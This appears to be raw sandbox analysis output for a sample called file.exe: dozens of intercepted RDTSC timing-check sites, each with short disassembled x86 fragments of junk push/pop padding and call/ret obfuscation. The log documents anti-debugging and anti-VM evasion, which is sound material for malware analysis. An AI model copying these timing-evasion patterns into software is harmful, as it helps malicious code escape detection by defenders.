Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0D112 second address: B0D128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007F23955E2772h 0x0000000e je 00007F23955E276Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0FF95 second address: B10004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F23955E58D8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007F23955E58E5h 0x0000002c mov edi, dword ptr [ebp+122D2BFBh] 0x00000032 push 00000000h 0x00000034 add bl, FFFFFFDCh 0x00000037 push 00000000h 0x00000039 pushad 0x0000003a jnl 00007F23955E58E8h 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 push edx 0x00000043 jnp 00007F23955E58DCh 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B110EB second address: B1118C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D1936h] 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F23955E2768h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov dword ptr [ebp+1247B5FDh], esi 0x00000034 sbb bx, 8600h 0x00000039 jmp 00007F23955E276Ch 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F23955E2768h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D1CDDh], ecx 0x00000065 mov eax, dword ptr [ebp+122D159Dh] 0x0000006b adc bh, 0000000Dh 0x0000006e push FFFFFFFFh 0x00000070 mov edi, dword ptr [ebp+122D1BFCh] 0x00000076 nop 0x00000077 jmp 00007F23955E2774h 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f push ebx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1118C second address: B11191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B11191 second address: B1119B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F23955E276Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13D99 second address: B13DA7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F23955E58D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13DA7 second address: B13DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13DAB second address: B13DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B12EE9 second address: B12F8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F23955E2766h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F23955E2768h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov bx, dx 0x0000002c mov ebx, dword ptr [ebp+122D1BAEh] 0x00000032 push dword ptr fs:[00000000h] 0x00000039 push ebx 0x0000003a mov bx, F9B6h 0x0000003e pop ebx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov bx, 5AB7h 0x0000004a mov eax, dword ptr [ebp+122D01C9h] 0x00000050 mov dword ptr [ebp+12470948h], esi 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push esi 0x0000005b call 00007F23955E2768h 0x00000060 pop esi 0x00000061 mov dword ptr [esp+04h], esi 0x00000065 add dword ptr [esp+04h], 00000017h 0x0000006d inc esi 0x0000006e push esi 0x0000006f ret 0x00000070 pop esi 0x00000071 ret 0x00000072 mov dword ptr [ebp+122D1BA9h], ebx 0x00000078 push eax 0x00000079 adc ebx, 343CBAB2h 0x0000007f pop edi 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F23955E2774h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B12F8E second address: B12F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14D8B second address: B14D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13EC8 second address: B13ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14E6F second address: B14E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14E75 second address: B14E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14E79 second address: B14E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18274 second address: B18278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18278 second address: B18288 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F23955E2766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B18288 second address: B18293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F23955E58D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E8F8 second address: B1E902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F23955E2766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E902 second address: B1E91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F23955E58DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E91B second address: B1E933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23955E2772h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E933 second address: B1E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E938 second address: B1E93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E93E second address: B1E944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E944 second address: B1E948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E49B second address: B1E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F23955E58DAh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E4AC second address: B1E4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F23955E2776h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E4C8 second address: B1E4CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22CAB second address: B22CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22CAF second address: B22CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F23955E58E2h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F23955E58E9h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2853E second address: B28557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23955E2773h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B28F07 second address: B28F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B28F0B second address: B28F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29070 second address: B29074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B291C8 second address: B291CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29317 second address: B29340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F23955E58DDh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F23955E58E1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29340 second address: B2937B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23955E276Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F23955E276Bh 0x00000011 pushad 0x00000012 popad 0x00000013 jno 00007F23955E2766h 0x00000019 popad 0x0000001a jmp 00007F23955E2772h 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2CBC2 second address: B2CBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2CBC6 second address: B2CBDF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F23955E2766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push ebx 0x0000000d jbe 00007F23955E2766h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD87B second address: ABD8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23955E58DAh 0x00000009 ja 00007F23955E58D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F23955E58E7h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8AB second address: ABD8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B31C5D second address: B31C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B31C63 second address: B31C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B31C6E second address: B31C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B03F79 second address: ADD212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F23955E2774h 0x00000010 jmp 00007F23955E276Eh 0x00000015 popad 0x00000016 jng 00007F23955E276Ch 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F23955E2768h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 call dword ptr [ebp+122D1C91h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F23955E2772h 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B040B8 second address: B040BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04636 second address: B0463A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0463A second address: B04640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04640 second address: B04661 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F23955E276Dh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04661 second address: B046B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F23947F2B06h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c popad 0x0000001d pop eax 0x0000001e movsx edi, dx 0x00000021 mov dl, 56h 0x00000023 call 00007F23947F2AF9h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F23947F2B06h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B046B6 second address: B046E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2394D2C4ABh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c ja 00007F2394D2C4B2h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 je 00007F2394D2C4B4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B046E8 second address: B046EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04918 second address: B0491C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04A06 second address: B04A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04A0C second address: B04A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04B0D second address: B04B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04E19 second address: B04E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04E1F second address: B04E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04E2C second address: B04E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04E30 second address: B04E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947F2B03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B051ED second address: B051F7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2394D2C4ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B052CE second address: ADDD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947F2B03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F23947F2AF6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 mov edx, dword ptr [ebp+122D34CCh] 0x0000001d jmp 00007F23947F2AFCh 0x00000022 call dword ptr [ebp+122D1B55h] 0x00000028 jng 00007F23947F2B0Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 jp 00007F23947F2AF6h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDD41 second address: ADDD5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2394D2C4ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F2394D2C4B0h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B320A3 second address: B320AF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F23947F2AF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3220B second address: B32213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B324E8 second address: B32516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947F2B07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F23947F2B03h 0x0000000f jmp 00007F23947F2AFDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32516 second address: B32544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F2394D2C4A6h 0x00000009 jno 00007F2394D2C4A6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F2394D2C4B8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32544 second address: B32548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3267B second address: B3267F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3267F second address: B326B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F23947F2AF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F23947F2B00h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F23947F2B00h 0x00000018 jno 00007F23947F2AF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B326B3 second address: B326B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32827 second address: B3282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B388D3 second address: B388D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B373C0 second address: B373C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B373C8 second address: B373CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B373CD second address: B373F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F23947F2AF6h 0x0000000a jne 00007F23947F2AF6h 0x00000010 jmp 00007F23947F2AFDh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B373F3 second address: B37401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F2394D2C4ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37401 second address: B37405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37405 second address: B3740A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37985 second address: B37989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37989 second address: B3798F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37D61 second address: B37D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37D6E second address: B37D74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37D74 second address: B37D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F23947F2AFCh 0x0000000c jg 00007F23947F2AF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37D86 second address: B37D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37D8C second address: B37D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37D90 second address: B37D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38045 second address: B3805A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23947F2AFAh 0x00000009 ja 00007F23947F2AF6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B382D7 second address: B382DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B382DD second address: B382E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3D812 second address: B3D818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
